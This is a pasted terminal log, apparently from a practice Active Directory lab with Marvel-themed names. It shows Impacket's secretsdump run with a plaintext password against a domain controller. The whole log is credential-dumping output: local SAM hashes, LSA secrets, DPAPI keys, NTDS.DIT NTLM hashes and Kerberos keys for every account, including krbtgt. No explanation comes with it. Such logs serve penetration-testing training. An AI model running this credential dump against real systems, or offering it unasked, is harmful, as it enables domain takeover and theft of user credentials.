Untitled

avatar
unknown
plain_text
2 months ago
5.6 kB
3
Indexable
┌──(root㉿kali)-[~]
└─# secretsdump.py MARVEL.local/hawkeye:'Password1'@192.168.57.12                                                        
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e0af8e620ac48921d35a096e7c18771
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction failed: string index out of range
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MARVEL\HYDRA-DC$:aes256-cts-hmac-sha1-96:1d2699e022bcbb15c893b354eb1a6e971d5bee0a3887613f8b7043726f279e5d
MARVEL\HYDRA-DC$:aes128-cts-hmac-sha1-96:9a14934ff5bee5a450d3ba99a45fef7d
MARVEL\HYDRA-DC$:des-cbc-md5:b6d3df7f152a4580
MARVEL\HYDRA-DC$:aad3b435b51404eeaad3b435b51404ee:c5c2306a49b2ec01888d38da52c57730:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x2b32a9a13dace5d7326fcf641f5d6aad07d3215c
dpapi_userkey:0x35bc4e2ad82a962004a11149f20f34be361cb0f6
[*] NL$KM 
 0000   4B C9 78 43 C4 72 21 A4  E9 A8 2A 45 C9 54 DB 9D   K.xC.r!...*E.T..
 0010   C3 2E FD 94 B9 80 B4 32  38 7C C6 C3 C6 76 0B B2   .......28|...v..
 0020   7E 88 86 3C 0D A5 FF ED  5C 89 4A B1 7D A4 5A 1E   ~..<....\.J.}.Z.
 0030   CB C4 2A 96 9E F9 5E 6D  A7 BD F9 B1 DB F1 7D 40   ..*...^m......}@
NL$KM:4bc97843c47221a4e9a82a45c954db9dc32efd94b980b432387cc6c3c6760bb27e88863c0da5ffed5c894ab17da45a1ecbc42a969ef95e6da7bdf9b1dbf17d40
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:91b045b250f8ecd65e75309df3c0ac60:::
MARVEL.local\tstark:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\SQLService:1104:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\fcastle:1105:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\pparker:1106:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
tbkIoOBQcw:1109:aad3b435b51404eeaad3b435b51404ee:51df31f14dd914f09ecd1788f8664be1:::
hawkeye:1110:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
HYDRA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:c5c2306a49b2ec01888d38da52c57730:::
THEPUNISHER$:1107:aad3b435b51404eeaad3b435b51404ee:aa1a186bccfed605dd25dfc63b3b4059:::
SPIDERMAN$:1108:aad3b435b51404eeaad3b435b51404ee:2f67ef6d001e19012b4c2e30b65be5e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:6ac3636034d8cc5be02a7b955db2d83cf8f4342f46fbe9f460cdbc64ad4c98b1
Administrator:aes128-cts-hmac-sha1-96:6153e51bf20645230c817e2a8e42df1c
Administrator:des-cbc-md5:79943e549bc8e9e0
krbtgt:aes256-cts-hmac-sha1-96:7430ce337970027adc7ac1cb9bad8e414072aa2c42b34edcfe7167dc79630840
krbtgt:aes128-cts-hmac-sha1-96:050b16cb8b66ad3833ce670cc7c479a1
krbtgt:des-cbc-md5:1fd6e9e64f192383
MARVEL.local\tstark:aes256-cts-hmac-sha1-96:648e4d16720b95bb2b18179624f44ca29f10961666f26caa4f78c77ec18f88e3
MARVEL.local\tstark:aes128-cts-hmac-sha1-96:e168d44446c0d284a38e135222b0c0b6
MARVEL.local\tstark:des-cbc-md5:734601e3fefd4a6e
MARVEL.local\SQLService:aes256-cts-hmac-sha1-96:f1344dbacc5dcaeb15d7f60b62a3d41d89983dd98ec670fb4b4e865e60c110ea
MARVEL.local\SQLService:aes128-cts-hmac-sha1-96:8abca7d4e8485abb77e7dbcd129b5861
MARVEL.local\SQLService:des-cbc-md5:6befea8a1ad9f46d
MARVEL.local\fcastle:aes256-cts-hmac-sha1-96:35f093c1a2aafb4dffbf63201a8a9ec9171a621a3ff90b199bc92273a74d8409
MARVEL.local\fcastle:aes128-cts-hmac-sha1-96:7583c4fe87334691ef5e7fd863f636f9
MARVEL.local\fcastle:des-cbc-md5:4fa7ad454cc78954
MARVEL.local\pparker:aes256-cts-hmac-sha1-96:906e23c09d876f3238f3ff8f2c247388ab36f7bc744cfbd4cb2b8f5a14e8914f
MARVEL.local\pparker:aes128-cts-hmac-sha1-96:339d007f3b450b6233607587d7ee0103
MARVEL.local\pparker:des-cbc-md5:61756889adfb4c29
tbkIoOBQcw:aes256-cts-hmac-sha1-96:4be530a27a36aaf0df37ace6769e044c42bf51cc4d3f7724ce491f34195eedef
tbkIoOBQcw:aes128-cts-hmac-sha1-96:92ebc418aacd950236ae0e11b30378cc
tbkIoOBQcw:des-cbc-md5:da0ed01049e69e80
hawkeye:aes256-cts-hmac-sha1-96:57e31f7a7915d729f6d1b64e19d6e271cc6203419af664f11af425f7cb94f935
hawkeye:aes128-cts-hmac-sha1-96:ad064f1de52f6965389ab9dde0867e22
hawkeye:des-cbc-md5:bf0d6775aebc0bc4
HYDRA-DC$:aes256-cts-hmac-sha1-96:1d2699e022bcbb15c893b354eb1a6e971d5bee0a3887613f8b7043726f279e5d
HYDRA-DC$:aes128-cts-hmac-sha1-96:9a14934ff5bee5a450d3ba99a45fef7d
HYDRA-DC$:des-cbc-md5:c7dc43e94ca446e5
THEPUNISHER$:aes256-cts-hmac-sha1-96:d6cb3dbd6d7c53619bb34de3e4f5bf4067eb3f4fd503e2556835739524261efa
THEPUNISHER$:aes128-cts-hmac-sha1-96:6a32f9de6dfda34fc17ed59d84e6bfe4
THEPUNISHER$:des-cbc-md5:3731e0fd6e0bfd0b
SPIDERMAN$:aes256-cts-hmac-sha1-96:0b8f8b2fb70bdd7356e59f655ef096987253bcd9dd5e79925fa14a143f7e6433
SPIDERMAN$:aes128-cts-hmac-sha1-96:f9f6b0f13e0cfc73543e65e4e6f32568
SPIDERMAN$:des-cbc-md5:0bea5d2ad91ad68c
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
Editor is loading...
Leave a Comment